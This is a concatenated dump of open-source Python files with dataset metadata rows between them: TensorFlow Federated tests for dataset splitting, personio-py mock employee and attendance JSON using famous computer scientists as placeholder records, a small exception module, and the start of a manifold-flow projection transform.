client_dataset, round_num)
recon_list = list(recon_dataset.as_numpy_iterator())
post_recon_list = list(post_recon_dataset.as_numpy_iterator())
self.assertAllEqual(recon_list, [[0, 1], [4, 5]])
self.assertAllEqual(post_recon_list, [])
round_num = tf.constant(2, dtype=tf.int64)
recon_dataset, post_recon_dataset = split_dataset_fn(
client_dataset, round_num)
recon_list = list(recon_dataset.as_numpy_iterator())
post_recon_list = list(post_recon_dataset.as_numpy_iterator())
self.assertAllEqual(recon_list, [[0, 1], [4, 5], [0, 1], [4, 5]])
self.assertAllEqual(post_recon_list, [])
def test_build_dataset_split_fn_aggregated_recon_epochs_variable_max_steps_zero_post_epochs(
self):
# 3 batches.
client_dataset = tf.data.Dataset.range(6).batch(2)
split_dataset_fn = federated_trainer_utils.build_dataset_split_fn(
recon_epochs_max=8,
recon_epochs_constant=False,
recon_steps_max=4,
post_recon_epochs=0,
post_recon_steps_max=None,
split_dataset=True,
split_dataset_strategy=federated_trainer_utils
.SPLIT_STRATEGY_AGGREGATED,
split_dataset_proportion=3)
round_num = tf.constant(1, dtype=tf.int64)
recon_dataset, post_recon_dataset = split_dataset_fn(
client_dataset, round_num)
recon_list = list(recon_dataset.as_numpy_iterator())
post_recon_list = list(post_recon_dataset.as_numpy_iterator())
self.assertAllEqual(recon_list, [[0, 1], [2, 3]])
self.assertAllEqual(post_recon_list, [])
round_num = tf.constant(2, dtype=tf.int64)
recon_dataset, post_recon_dataset = split_dataset_fn(
client_dataset, round_num)
recon_list = list(recon_dataset.as_numpy_iterator())
post_recon_list = list(post_recon_dataset.as_numpy_iterator())
self.assertAllEqual(recon_list, [[0, 1], [2, 3], [0, 1], [2, 3]])
self.assertAllEqual(post_recon_list, [])
def test_build_dataset_split_fn_none_recon_epochs_variable_max_steps_multiple_post_epochs(
self):
# 3 batches.
client_dataset = tf.data.Dataset.range(6).batch(2)
split_dataset_fn = federated_trainer_utils.build_dataset_split_fn(
recon_epochs_max=8,
recon_epochs_constant=False,
recon_steps_max=4,
post_recon_epochs=2,
post_recon_steps_max=None,
split_dataset=False,
split_dataset_strategy=None,
split_dataset_proportion=None)
round_num = tf.constant(1, dtype=tf.int64)
recon_dataset, post_recon_dataset = split_dataset_fn(
client_dataset, round_num)
recon_list = list(recon_dataset.as_numpy_iterator())
post_recon_list = list(post_recon_dataset.as_numpy_iterator())
self.assertAllEqual(recon_list, [[0, 1], [2, 3], [4, 5]])
self.assertAllEqual(post_recon_list,
[[0, 1], [2, 3], [4, 5], [0, 1], [2, 3], [4, 5]])
round_num = tf.constant(2, dtype=tf.int64)
recon_dataset, post_recon_dataset = split_dataset_fn(
client_dataset, round_num)
recon_list = list(recon_dataset.as_numpy_iterator())
post_recon_list = list(post_recon_dataset.as_numpy_iterator())
self.assertAllEqual(recon_list, [[0, 1], [2, 3], [4, 5], [0, 1]])
self.assertAllEqual(post_recon_list,
[[0, 1], [2, 3], [4, 5], [0, 1], [2, 3], [4, 5]])
def test_build_dataset_split_fn_skip_recon_epochs_variable_max_steps_multiple_post_epochs(
self):
# 3 batches.
client_dataset = tf.data.Dataset.range(6).batch(2)
split_dataset_fn = federated_trainer_utils.build_dataset_split_fn(
recon_epochs_max=8,
recon_epochs_constant=False,
recon_steps_max=4,
post_recon_epochs=2,
post_recon_steps_max=None,
split_dataset=True,
split_dataset_strategy=federated_trainer_utils.SPLIT_STRATEGY_SKIP,
split_dataset_proportion=2)
round_num = tf.constant(1, dtype=tf.int64)
recon_dataset, post_recon_dataset = split_dataset_fn(
client_dataset, round_num)
recon_list = list(recon_dataset.as_numpy_iterator())
post_recon_list = list(post_recon_dataset.as_numpy_iterator())
self.assertAllEqual(recon_list, [[0, 1], [4, 5]])
self.assertAllEqual(post_recon_list, [[2, 3], [2, 3]])
round_num = tf.constant(2, dtype=tf.int64)
recon_dataset, post_recon_dataset = split_dataset_fn(
client_dataset, round_num)
recon_list = list(recon_dataset.as_numpy_iterator())
post_recon_list = list(post_recon_dataset.as_numpy_iterator())
self.assertAllEqual(recon_list, [[0, 1], [4, 5], [0, 1], [4, 5]])
self.assertAllEqual(post_recon_list, [[2, 3], [2, 3]])
def test_build_dataset_split_fn_aggregated_recon_epochs_variable_max_steps_multiple_post_epochs(
self):
# 3 batches.
client_dataset = tf.data.Dataset.range(6).batch(2)
split_dataset_fn = federated_trainer_utils.build_dataset_split_fn(
recon_epochs_max=8,
recon_epochs_constant=False,
recon_steps_max=4,
post_recon_epochs=2,
post_recon_steps_max=None,
split_dataset=True,
split_dataset_strategy=federated_trainer_utils
.SPLIT_STRATEGY_AGGREGATED,
split_dataset_proportion=2)
round_num = tf.constant(1, dtype=tf.int64)
recon_dataset, post_recon_dataset = split_dataset_fn(
client_dataset, round_num)
recon_list = list(recon_dataset.as_numpy_iterator())
post_recon_list = list(post_recon_dataset.as_numpy_iterator())
self.assertAllEqual(recon_list, [[0, 1], [2, 3]])
self.assertAllEqual(post_recon_list, [[4, 5], [4, 5]])
round_num = tf.constant(2, dtype=tf.int64)
recon_dataset, post_recon_dataset = split_dataset_fn(
client_dataset, round_num)
recon_list = list(recon_dataset.as_numpy_iterator())
post_recon_list = list(post_recon_dataset.as_numpy_iterator())
self.assertAllEqual(recon_list, [[0, 1], [2, 3], [0, 1], [2, 3]])
self.assertAllEqual(post_recon_list, [[4, 5], [4, 5]])
def test_build_dataset_split_fn_none_post_recon_multiple_epochs_max_steps(
self):
# 3 batches.
client_dataset = tf.data.Dataset.range(6).batch(2)
split_dataset_fn = federated_trainer_utils.build_dataset_split_fn(
recon_epochs_max=1,
recon_epochs_constant=True,
recon_steps_max=None,
post_recon_epochs=2,
post_recon_steps_max=4,
split_dataset=False,
split_dataset_strategy=None,
split_dataset_proportion=None)
# Round number doesn't matter.
round_num = tf.constant(1, dtype=tf.int64)
recon_dataset, post_recon_dataset = split_dataset_fn(
client_dataset, round_num)
recon_list = list(recon_dataset.as_numpy_iterator())
post_recon_list = list(post_recon_dataset.as_numpy_iterator())
self.assertAllEqual(recon_list, [[0, 1], [2, 3], [4, 5]])
self.assertAllEqual(post_recon_list, [[0, 1], [2, 3], [4, 5], [0, 1]])
# Round number doesn't matter.
round_num = tf.constant(2, dtype=tf.int64)
recon_dataset, post_recon_dataset = split_dataset_fn(
client_dataset, round_num)
recon_list = list(recon_dataset.as_numpy_iterator())
post_recon_list = list(post_recon_dataset.as_numpy_iterator())
self.assertAllEqual(recon_list, [[0, 1], [2, 3], [4, 5]])
self.assertAllEqual(post_recon_list, [[0, 1], [2, 3], [4, 5], [0, 1]])
def test_build_dataset_split_fn_skip_post_recon_multiple_epochs_max_steps(
self):
# 3 batches.
client_dataset = tf.data.Dataset.range(6).batch(2)
split_dataset_fn = federated_trainer_utils.build_dataset_split_fn(
recon_epochs_max=1,
recon_epochs_constant=True,
recon_steps_max=None,
post_recon_epochs=2,
post_recon_steps_max=4,
split_dataset=True,
split_dataset_strategy=federated_trainer_utils.SPLIT_STRATEGY_SKIP,
split_dataset_proportion=2)
# Round number doesn't matter.
round_num = tf.constant(1, dtype=tf.int64)
recon_dataset, post_recon_dataset = split_dataset_fn(
client_dataset, round_num)
recon_list = list(recon_dataset.as_numpy_iterator())
post_recon_list = list(post_recon_dataset.as_numpy_iterator())
self.assertAllEqual(recon_list, [[0, 1], [4, 5]])
self.assertAllEqual(post_recon_list, [[2, 3], [2, 3]])
# Round number doesn't matter.
round_num = tf.constant(2, dtype=tf.int64)
recon_dataset, post_recon_dataset = split_dataset_fn(
client_dataset, round_num)
recon_list = list(recon_dataset.as_numpy_iterator())
post_recon_list = list(post_recon_dataset.as_numpy_iterator())
self.assertAllEqual(recon_list, [[0, 1], [4, 5]])
self.assertAllEqual(post_recon_list, [[2, 3], [2, 3]])
def test_build_dataset_split_fn_aggregated_post_recon_multiple_epochs_max_steps(
self):
# 3 batches.
client_dataset = tf.data.Dataset.range(6).batch(2)
split_dataset_fn = federated_trainer_utils.build_dataset_split_fn(
recon_epochs_max=1,
recon_epochs_constant=True,
recon_steps_max=None,
post_recon_epochs=2,
post_recon_steps_max=4,
split_dataset=True,
split_dataset_strategy=federated_trainer_utils
.SPLIT_STRATEGY_AGGREGATED,
split_dataset_proportion=2)
# Round number doesn't matter.
round_num = tf.constant(1, dtype=tf.int64)
recon_dataset, post_recon_dataset = split_dataset_fn(
client_dataset, round_num)
recon_list = list(recon_dataset.as_numpy_iterator())
post_recon_list = list(post_recon_dataset.as_numpy_iterator())
self.assertAllEqual(recon_list, [[0, 1], [2, 3]])
self.assertAllEqual(post_recon_list, [[4, 5], [4, 5]])
# Round number doesn't matter.
round_num = tf.constant(2, dtype=tf.int64)
recon_dataset, post_recon_dataset = split_dataset_fn(
client_dataset, round_num)
recon_list = list(recon_dataset.as_numpy_iterator())
post_recon_list = list(post_recon_dataset.as_numpy_iterator())
self.assertAllEqual(recon_list, [[0, 1], [2, 3]])
self.assertAllEqual(post_recon_list, [[4, 5], [4, 5]])
def test_build_dataset_split_none_fn_split_dataset_zero_batches(self):
"""Ensures clients without any data don't fail."""
# 0 batches.
client_dataset = tf.data.Dataset.range(0).batch(2)
split_dataset_fn = federated_trainer_utils.build_dataset_split_fn(
recon_epochs_max=1,
recon_epochs_constant=True,
recon_steps_max=None,
post_recon_epochs=1,
post_recon_steps_max=None,
split_dataset=False,
split_dataset_strategy=None,
split_dataset_proportion=None)
# Round number doesn't matter.
round_num = tf.constant(1, dtype=tf.int64)
recon_dataset, post_recon_dataset = split_dataset_fn(
client_dataset, round_num)
recon_list = list(recon_dataset.as_numpy_iterator())
post_recon_list = list(post_recon_dataset.as_numpy_iterator())
self.assertAllEqual(recon_list, [])
self.assertAllEqual(post_recon_list, [])
# Round number doesn't matter.
round_num = tf.constant(2, dtype=tf.int64)
recon_dataset, post_recon_dataset = split_dataset_fn(
client_dataset, round_num)
recon_list = list(recon_dataset.as_numpy_iterator())
post_recon_list = list(post_recon_dataset.as_numpy_iterator())
self.assertAllEqual(recon_list, [])
self.assertAllEqual(post_recon_list, [])
def test_build_dataset_split_skip_fn_split_dataset_zero_batches(self):
"""Ensures clients without any data don't fail."""
# 0 batches.
client_dataset = tf.data.Dataset.range(0).batch(2)
split_dataset_fn = federated_trainer_utils.build_dataset_split_fn(
recon_epochs_max=1,
recon_epochs_constant=True,
recon_steps_max=None,
post_recon_epochs=1,
post_recon_steps_max=None,
split_dataset=True,
split_dataset_strategy=federated_trainer_utils.SPLIT_STRATEGY_SKIP,
split_dataset_proportion=10)
# Round number doesn't matter.
round_num = tf.constant(1, dtype=tf.int64)
recon_dataset, post_recon_dataset = split_dataset_fn(
client_dataset, round_num)
recon_list = list(recon_dataset.as_numpy_iterator())
post_recon_list = list(post_recon_dataset.as_numpy_iterator())
self.assertAllEqual(recon_list, [])
self.assertAllEqual(post_recon_list, [])
# Round number doesn't matter.
round_num = tf.constant(2, dtype=tf.int64)
recon_dataset, post_recon_dataset = split_dataset_fn(
client_dataset, round_num)
recon_list = list(recon_dataset.as_numpy_iterator())
post_recon_list = list(post_recon_dataset.as_numpy_iterator())
self.assertAllEqual(recon_list, [])
self.assertAllEqual(post_recon_list, [])
def test_build_dataset_split_aggregated_fn_split_dataset_zero_batches(self):
"""Ensures clients without any data don't fail."""
# 0 batches.
client_dataset = tf.data.Dataset.range(0).batch(2)
split_dataset_fn = federated_trainer_utils.build_dataset_split_fn(
recon_epochs_max=1,
recon_epochs_constant=True,
recon_steps_max=None,
post_recon_epochs=1,
post_recon_steps_max=None,
split_dataset=True,
split_dataset_strategy=federated_trainer_utils
.SPLIT_STRATEGY_AGGREGATED,
split_dataset_proportion=10)
# Round number doesn't matter.
round_num = tf.constant(1, dtype=tf.int64)
recon_dataset, post_recon_dataset = split_dataset_fn(
client_dataset, round_num)
recon_list = list(recon_dataset.as_numpy_iterator())
post_recon_list = list(post_recon_dataset.as_numpy_iterator())
self.assertAllEqual(recon_list, [])
self.assertAllEqual(post_recon_list, [])
# Round number doesn't matter.
round_num = tf.constant(2, dtype=tf.int64)
recon_dataset, post_recon_dataset = split_dataset_fn(
client_dataset, round_num)
recon_list = list(recon_dataset.as_numpy_iterator())
post_recon_list = list(post_recon_dataset.as_numpy_iterator())
self.assertAllEqual(recon_list, [])
self.assertAllEqual(post_recon_list, [])
if __name__ == '__main__':
tf.test.main()
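For readers who want the split semantics without running TensorFlow, here is a tiny pure-Python sketch of the `skip` and `aggregated` strategies, reverse-engineered from the expectations in the tests above. The real `build_dataset_split_fn` operates on `tf.data` datasets and also handles epoch repetition and step caps, and its exact boundary arithmetic may differ from this guess.

```python
def split_batches(batches, strategy, proportion):
    """Split a list of batches into (recon, post_recon) lists.

    Illustrative sketch only: matches the single-epoch expectations in the
    tests above, not necessarily the library's TF implementation.
    """
    if strategy == "skip":
        # Every `proportion`-th batch (starting at index 0) is used for
        # reconstruction; the remaining batches are used post-reconstruction.
        recon = [b for i, b in enumerate(batches) if i % proportion == 0]
        post = [b for i, b in enumerate(batches) if i % proportion != 0]
    elif strategy == "aggregated":
        # A leading contiguous chunk goes to reconstruction, the tail to
        # post-reconstruction.
        cut = len(batches) // proportion + 1 if batches else 0
        recon, post = batches[:cut], batches[cut:]
    else:
        raise ValueError("unknown strategy: %s" % strategy)
    return recon, post
```

For example, `split_batches([[0, 1], [2, 3], [4, 5]], "skip", 2)` yields `([[0, 1], [4, 5]], [[2, 3]])`, mirroring `test_build_dataset_split_fn_skip` before epoch repetition is applied.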
# tests/mock_data.py (philipflohr/personio-py, Apache-2.0)
import json
json_string_employees = """
{
"success": true,
"data": [{
"type": "Employee",
"attributes": {
"id": {
"label": "ID",
"value": 2116366
},
"first_name": {
"label": "First name",
"value": "Richard"
},
"last_name": {
"label": "Last name",
"value": "Stallman"
},
"email": {
"label": "Email",
"value": "rms@example.org"
},
"gender": {
"label": "Gender",
"value": "male"
},
"status": {
"label": "Status",
"value": "active"
},
"position": {
"label": "Position",
"value": "St. IGNUcius"
},
"supervisor": {
"label": "Supervisor",
"value": null
},
"employment_type": {
"label": "Employment type",
"value": "internal"
},
"weekly_working_hours": {
"label": "Weekly hours",
"value": "40"
},
"hire_date": {
"label": "Hire date",
"value": "1983-09-01T00:00:00+02:00"
},
"contract_end_date": {
"label": "Contract ends",
"value": null
},
"termination_date": {
"label": "Termination date",
"value": null
},
"termination_type": {
"label": "Termination type",
"value": ""
},
"termination_reason": {
"label": "Termination reason",
"value": ""
},
"probation_period_end": {
"label": "Probation period end",
"value": null
},
"created_at": {
"label": "created_at",
"value": "2020-07-23T19:57:57+02:00"
},
"last_modified_at": {
"label": "Last modified",
"value": "2020-07-23T19:57:57+02:00"
},
"subcompany": {
"label": "Subcompany",
"value": null
},
"office": {
"label": "Office",
"value": null
},
"department": {
"label": "Department",
"value": null
},
"cost_centers": {
"label": "Cost center",
"value": []
},
"holiday_calendar": {
"label": "Public holidays",
"value": {
"type": "HolidayCalendar",
"attributes": {
"id": 1,
"name": "Deutschland Feiertage",
"country": "DE",
"state": null
}
}
},
"absence_entitlement": {
"label": "Absence entitlement",
"value": [{
"type": "TimeOffType",
"attributes": {
"id": 195824,
"name": "Vacation",
"entitlement": 0
}
}
]
},
"work_schedule": {
"label": "Work schedule",
"value": {
"type": "WorkSchedule",
"attributes": {
"id": 232617,
"name": "40 hours",
"valid_from": null,
"monday": "08:00",
"tuesday": "08:00",
"wednesday": "08:00",
"thursday": "08:00",
"friday": "08:00",
"saturday": "00:00",
"sunday": "00:00"
}
}
},
"fix_salary": {
"label": "Fix salary",
"value": 0
},
"fix_salary_interval": {
"label": "Salary interval",
"value": ""
},
"hourly_salary": {
"label": "Hourly salary",
"value": 0
},
"vacation_day_balance": {
"label": "Vacation day balance",
"value": 25
},
"last_working_day": {
"label": "Last day of work",
"value": null
},
"profile_picture": {
"label": "Profile Picture",
"value": null
},
"team": {
"label": "Team",
"value": null
},
"dynamic_1146702": {
"label": "Country of Birth",
"value": "USA"
},
"dynamic_1146666": {
"label": "Birthday",
"value": "1953-03-16T00:00:00+01:00"
}
}
}, {
"type": "Employee",
"attributes": {
"id": {
"label": "ID",
"value": 2116365
},
"first_name": {
"label": "First name",
"value": "Alan"
},
"last_name": {
"label": "Last name",
"value": "Turing"
},
"email": {
"label": "Email",
"value": "alan@example.org"
},
"gender": {
"label": "Gender",
"value": "male"
},
"status": {
"label": "Status",
"value": "active"
},
"position": {
"label": "Position",
"value": "Chief Cryptanalyst"
},
"supervisor": {
"label": "Supervisor",
"value": null
},
"employment_type": {
"label": "Employment type",
"value": "internal"
},
"weekly_working_hours": {
"label": "Weekly hours",
"value": "40"
},
"hire_date": {
"label": "Hire date",
"value": "1932-01-01T00:00:00+01:00"
},
"contract_end_date": {
"label": "Contract ends",
"value": "1954-06-07T00:00:00+01:00"
},
"termination_date": {
"label": "Termination date",
"value": null
},
"termination_type": {
"label": "Termination type",
"value": ""
},
"termination_reason": {
"label": "Termination reason",
"value": ""
},
"probation_period_end": {
"label": "Probation period end",
"value": null
},
"created_at": {
"label": "created_at",
"value": "2020-07-23T19:51:46+02:00"
},
"last_modified_at": {
"label": "Last modified",
"value": "2020-07-23T19:53:48+02:00"
},
"subcompany": {
"label": "Subcompany",
"value": null
},
"office": {
"label": "Office",
"value": null
},
"department": {
"label": "Department",
"value": null
},
"cost_centers": {
"label": "Cost center",
"value": []
},
"holiday_calendar": {
"label": "Public holidays",
"value": {
"type": "HolidayCalendar",
"attributes": {
"id": 1,
"name": "Deutschland Feiertage",
"country": "DE",
"state": null
}
}
},
"absence_entitlement": {
"label": "Absence entitlement",
"value": [{
"type": "TimeOffType",
"attributes": {
"id": 195824,
"name": "Vacation",
"entitlement": 0
}
}
]
},
"work_schedule": {
"label": "Work schedule",
"value": {
"type": "WorkSchedule",
"attributes": {
"id": 232617,
"name": "40 hours",
"valid_from": null,
"monday": "08:00",
"tuesday": "08:00",
"wednesday": "08:00",
"thursday": "08:00",
"friday": "08:00",
"saturday": "00:00",
"sunday": "00:00"
}
}
},
"fix_salary": {
"label": "Fix salary",
"value": 0
},
"fix_salary_interval": {
"label": "Salary interval",
"value": ""
},
"hourly_salary": {
"label": "Hourly salary",
"value": 0
},
"vacation_day_balance": {
"label": "Vacation day balance",
"value": 25
},
"last_working_day": {
"label": "Last day of work",
"value": null
},
"profile_picture": {
"label": "Profile Picture",
"value": null
},
"team": {
"label": "Team",
"value": null
},
"dynamic_1146702": {
"label": "Country of Birth",
"value": "England"
},
"dynamic_1146666": {
"label": "Birthday",
"value": "1912-06-23T00:00:00+01:00"
}
}
}, {
"type": "Employee",
"attributes": {
"id": {
"label": "ID",
"value": 2040614
},
"first_name": {
"label": "First name",
"value": "Ada"
},
"last_name": {
"label": "Last name",
"value": "Lovelace"
},
"email": {
"label": "Email",
"value": "ada@example.org"
},
"gender": {
"label": "Gender",
"value": "female"
},
"status": {
"label": "Status",
"value": "active"
},
"position": {
"label": "Position",
"value": "first programmer ever"
},
"supervisor": {
"label": "Supervisor",
"value": null
},
"employment_type": {
"label": "Employment type",
"value": "internal"
},
"weekly_working_hours": {
"label": "Weekly hours",
"value": "35"
},
"hire_date": {
"label": "Hire date",
"value": "1835-02-01T00:00:00+00:53"
},
"contract_end_date": {
"label": "Contract ends",
"value": null
},
"termination_date": {
"label": "Termination date",
"value": null
},
"termination_type": {
"label": "Termination type",
"value": ""
},
"termination_reason": {
"label": "Termination reason",
"value": ""
},
"probation_period_end": {
"label": "Probation period end",
"value": null
},
"created_at": {
"label": "created_at",
"value": "2020-06-18T18:43:44+02:00"
},
"last_modified_at": {
"label": "Last modified",
"value": "2020-07-23T18:00:26+02:00"
},
"subcompany": {
"label": "Subcompany",
"value": null
},
"office": {
"label": "Office",
"value": null
},
"department": {
"label": "Department",
"value": {
"type": "Department",
"attributes": {
"id": 625448,
"name": "Operations"
}
}
},
"cost_centers": {
"label": "Cost center",
"value": []
},
"holiday_calendar": {
"label": "Public holidays",
"value": {
"type": "HolidayCalendar",
"attributes": {
"id": 1,
"name": "Deutschland Feiertage",
"country": "DE",
"state": null
}
}
},
"absence_entitlement": {
"label": "Absence entitlement",
"value": [{
"type": "TimeOffType",
"attributes": {
"id": 195824,
"name": "Vacation",
"entitlement": 0
}
}
]
},
"work_schedule": {
"label": "Work schedule",
"value": {
"type": "WorkSchedule",
"attributes": {
"id": 232617,
"name": "Vollzeit, 40 Stunden ohne Zeiterfassung, (Mo,Di,Mi,Do,Fr) ",
"valid_from": null,
"monday": "08:00",
"tuesday": "08:00",
"wednesday": "08:00",
"thursday": "08:00",
"friday": "08:00",
"saturday": "00:00",
"sunday": "00:00"
}
}
},
"fix_salary": {
"label": "Fix salary",
"value": 0
},
"fix_salary_interval": {
"label": "Salary interval",
"value": ""
},
"hourly_salary": {
"label": "Hourly salary",
"value": 0
},
"vacation_day_balance": {
"label": "Vacation day balance",
"value": 25
},
"last_working_day": {
"label": "Last day of work",
"value": null
},
"profile_picture": {
"label": "Profile Picture",
"value": null
},
"team": {
"label": "Team",
"value": null
},
"dynamic_1146702": {
"label": "Country of Birth",
"value": "England"
},
"dynamic_1146666": {
"label": "Birthday",
"value": "1815-12-10T00:00:00+01:00"
}
}
}
]
}
"""
json_dict_employees = json.loads(json_string_employees)
json_string_employee_ada = """
{
"success": true,
"data": {
"type": "Employee",
"attributes": {
"id": {
"label": "ID",
"value": 2040614
},
"first_name": {
"label": "First name",
"value": "Ada"
},
"last_name": {
"label": "Last name",
"value": "Lovelace"
},
"email": {
"label": "Email",
"value": "ada@example.org"
},
"gender": {
"label": "Gender",
"value": "female"
},
"status": {
"label": "Status",
"value": "active"
},
"position": {
"label": "Position",
"value": "first programmer ever"
},
"supervisor": {
"label": "Supervisor",
"value": null
},
"employment_type": {
"label": "Employment type",
"value": "internal"
},
"weekly_working_hours": {
"label": "Weekly hours",
"value": "35"
},
"hire_date": {
"label": "Hire date",
"value": "1835-02-01T00:00:00+00:53"
},
"contract_end_date": {
"label": "Contract ends",
"value": null
},
"termination_date": {
"label": "Termination date",
"value": null
},
"termination_type": {
"label": "Termination type",
"value": ""
},
"termination_reason": {
"label": "Termination reason",
"value": ""
},
"probation_period_end": {
"label": "Probation period end",
"value": null
},
"created_at": {
"label": "created_at",
"value": "2020-06-18T18:43:44+02:00"
},
"last_modified_at": {
"label": "Last modified",
"value": "2020-07-23T18:00:26+02:00"
},
"subcompany": {
"label": "Subcompany",
"value": null
},
"office": {
"label": "Office",
"value": null
},
"department": {
"label": "Department",
"value": {
"type": "Department",
"attributes": {
"id": 625448,
"name": "Operations"
}
}
},
"cost_centers": {
"label": "Cost center",
"value": []
},
"holiday_calendar": {
"label": "Public holidays",
"value": {
"type": "HolidayCalendar",
"attributes": {
"id": 1,
"name": "Deutschland Feiertage",
"country": "DE",
"state": null
}
}
},
"absence_entitlement": {
"label": "Absence entitlement",
"value": [{
"type": "TimeOffType",
"attributes": {
"id": 195824,
"name": "Vacation",
"entitlement": 0
}
}
]
},
"work_schedule": {
"label": "Work schedule",
"value": {
"type": "WorkSchedule",
"attributes": {
"id": 232617,
"name": "Vollzeit, 40 Stunden ohne Zeiterfassung, (Mo,Di,Mi,Do,Fr) ",
"valid_from": null,
"monday": "08:00",
"tuesday": "08:00",
"wednesday": "08:00",
"thursday": "08:00",
"friday": "08:00",
"saturday": "00:00",
"sunday": "00:00"
}
}
},
"fix_salary": {
"label": "Fix salary",
"value": 0
},
"fix_salary_interval": {
"label": "Salary interval",
"value": ""
},
"hourly_salary": {
"label": "Hourly salary",
"value": 0
},
"vacation_day_balance": {
"label": "Vacation day balance",
"value": 25
},
"last_working_day": {
"label": "Last day of work",
"value": null
},
"profile_picture": {
"label": "Profile Picture",
"value": null
},
"team": {
"label": "Team",
"value": null
},
"dynamic_1146702": {
"label": "Country of Birth",
"value": "England"
},
"dynamic_1146666": {
"label": "Birthday",
"value": "1815-12-10T00:00:00+01:00"
}
}
}
}
"""
json_dict_employee_ada = json.loads(json_string_employee_ada)
json_string_empty_response = """
{
"success": true,
"data": []
}
"""
json_dict_empty_response = json.loads(json_string_empty_response)
json_string_attendance_rms = """
{
"success": true,
"metadata":{
"current_page":1,
"total_pages":1
},
"data": [{
"id": 33479712,
"type": "AttendancePeriod",
"attributes": {
"employee": 2116366,
"date": "1985-03-20",
"start_time": "11:00",
"end_time": "12:30",
"break": 60,
"comment": "release day! GNU Emacs Version 13 is available as free software now *yay*",
"is_holiday": false,
"is_on_time_off": false
}
}, {
"id": 33479612,
"type": "AttendancePeriod",
"attributes": {
"employee": 2116366,
"date": "1985-03-19",
"start_time": "10:30",
"end_time": "22:00",
"break": 120,
"comment": "just a couple more parentheses...",
"is_holiday": false,
"is_on_time_off": false
}
}, {
"id": 33479602,
"type": "AttendancePeriod",
"attributes": {
"employee": 2116366,
"date": "1985-03-18",
"start_time": "10:00",
"end_time": "20:00",
"break": 90,
"comment": "working on GNU Emacs",
"is_holiday": false,
"is_on_time_off": false
}
}
]
}
"""
json_dict_attendance_rms = json.loads(json_string_attendance_rms)
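Each Personio attribute in these fixtures is wrapped as a `{label, value}` object. A minimal sketch of traversing that shape to collect field values — the trimmed sample payload below is illustrative, not one of the fixtures above:

```python
import json

# Trimmed sample in the same {label, value} attribute format as the
# mock employees payload above.
sample = """
{
  "success": true,
  "data": [
    {"type": "Employee", "attributes": {"first_name": {"label": "First name", "value": "Ada"}}},
    {"type": "Employee", "attributes": {"first_name": {"label": "First name", "value": "Alan"}}}
  ]
}
"""

payload = json.loads(sample)
# Unwrap the nested {label, value} objects to get the bare field values.
names = [e["attributes"]["first_name"]["value"] for e in payload["data"]]
print(names)  # ['Ada', 'Alan']
```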
| 24.690013 | 95 | 0.399926 | 1,442 | 19,036 | 5.151179 | 0.144938 | 0.04483 | 0.019386 | 0.006462 | 0.893915 | 0.889607 | 0.875067 | 0.875067 | 0.842219 | 0.833603 | 0 | 0.065135 | 0.430605 | 19,036 | 770 | 96 | 24.722078 | 0.620168 | 0 | 0 | 0.68799 | 0 | 0.002611 | 0.97883 | 0.052269 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.001305 | 0 | 0.001305 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
be83377010c9bb0b892eaaa141cb09f2b8b1f3a5 | 164 | py | Python | core/utils/Error/exception.py | osam7a/JesterBot | aeaa2e24af54967573c88bacdec4a704755cdcb7 | [
"MIT"
] | null | null | null | core/utils/Error/exception.py | osam7a/JesterBot | aeaa2e24af54967573c88bacdec4a704755cdcb7 | [
"MIT"
] | null | null | null | core/utils/Error/exception.py | osam7a/JesterBot | aeaa2e24af54967573c88bacdec4a704755cdcb7 | [
"MIT"
] | null | null | null | class myException(Exception):
    """Base class for bot-specific errors."""


class InvalidActivityChoice(myException):
    """Raised when an unsupported activity choice is supplied."""


class InvalidChannelID(myException):
    """Raised when a channel ID cannot be resolved."""
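A hedged sketch of how such bot-specific errors are typically raised and caught as exception subclasses — `resolve_channel` and the single-channel lookup are hypothetical, not part of the repo:

```python
class myException(Exception):
    """Base class for bot-specific errors (self-contained copy for this sketch)."""

class InvalidChannelID(myException):
    """Raised when a channel ID cannot be resolved."""

def resolve_channel(channel_id):
    # Hypothetical lookup: only one channel exists in this sketch.
    if channel_id != 1234:
        raise InvalidChannelID(f"no channel with id {channel_id}")
    return "general"

try:
    resolve_channel(999)
except myException as err:
    # Catching the base class also catches every specific error subclass.
    caught = str(err)

assert caught == "no channel with id 999"
assert resolve_channel(1234) == "general"
```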
| 16.4 | 36 | 0.628049 | 15 | 164 | 6.6 | 0.6 | 0.242424 | 0.222222 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.29878 | 164 | 9 | 37 | 18.222222 | 0.86087 | 0 | 0 | 0.428571 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.428571 | false | 0.428571 | 0 | 0 | 0.571429 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 7 |
be9ae240d3653015ed585046d28d6f4497045544 | 3,883 | py | Python | manifold_flow/transforms/projections.py | selflein/manifold-flow | 2cc91c7acf61c8b4df07a940f0311ee93c39f0c7 | [
"MIT"
] | 199 | 2020-03-31T22:45:31.000Z | 2022-03-18T14:57:23.000Z | manifold_flow/transforms/projections.py | selflein/manifold-flow | 2cc91c7acf61c8b4df07a940f0311ee93c39f0c7 | [
"MIT"
] | 4 | 2020-04-04T18:45:33.000Z | 2022-01-05T03:16:07.000Z | manifold_flow/transforms/projections.py | selflein/manifold-flow | 2cc91c7acf61c8b4df07a940f0311ee93c39f0c7 | [
"MIT"
] | 25 | 2020-04-01T11:04:11.000Z | 2022-03-30T17:21:44.000Z | import torch
import logging
from manifold_flow import transforms
from manifold_flow.utils.various import product
logger = logging.getLogger(__name__)
class ProjectionSplit(transforms.Transform):
def __init__(self, input_dim, output_dim):
super().__init__()
self.input_dim = input_dim
self.output_dim = output_dim
self.input_dim_total = product(input_dim)
self.output_dim_total = product(output_dim)
self.mode_in = "vector" if isinstance(input_dim, int) else "image"
self.mode_out = "vector" if isinstance(output_dim, int) else "image"
